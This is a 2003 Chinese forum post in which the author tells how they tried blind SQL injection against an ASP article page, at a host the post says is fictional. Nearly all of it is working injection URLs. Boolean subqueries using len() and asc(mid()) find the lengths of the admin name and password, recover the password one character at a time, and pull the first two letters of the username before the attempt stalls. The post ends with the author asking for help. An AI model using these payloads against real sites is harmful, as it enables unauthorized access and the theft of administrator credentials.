近日看了几位高手写的关于sql injection文章,因此也想试试这sql injection的威力,下面是我的过程
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where len(admin)=9)
admin:9位
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where len(pass)=10)
pass:10位
开始测试密码
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,1,1))=121)
通过查询asc,得到121是y,因此
pass的第一位:y
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,2,1))=111)
第二位:o
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,3,1))=117)
第三位:u
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,4,1))=49)
第四位:1
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,5,1))=51)
第五位:3
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,6,1))=49)
第六位:1
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,7,1))=52)
第七位:4
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,8,1))=53)
第八位:5
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,9,1))=50)
第九位:2
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(pass,10,1))=49)
第十位:1
开始测试用户名
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(admin,1,1))=119)
admin第一位:w
http://www.123.com/article/show.asp?id=984 and 1=(select id from admin where asc(mid(admin,2,1))=101)
admin第二位:e
接下来的几位,不管后面的数字怎么变,显示的都是同一个页面,想不通了,还有什么东西不能转换为asc码的!
郁闷!!!
http://www.123.com为虚构!作者: damnyou 时间: 2003-8-15 11:53 标题: 郁闷,想试试sql injection却失败了!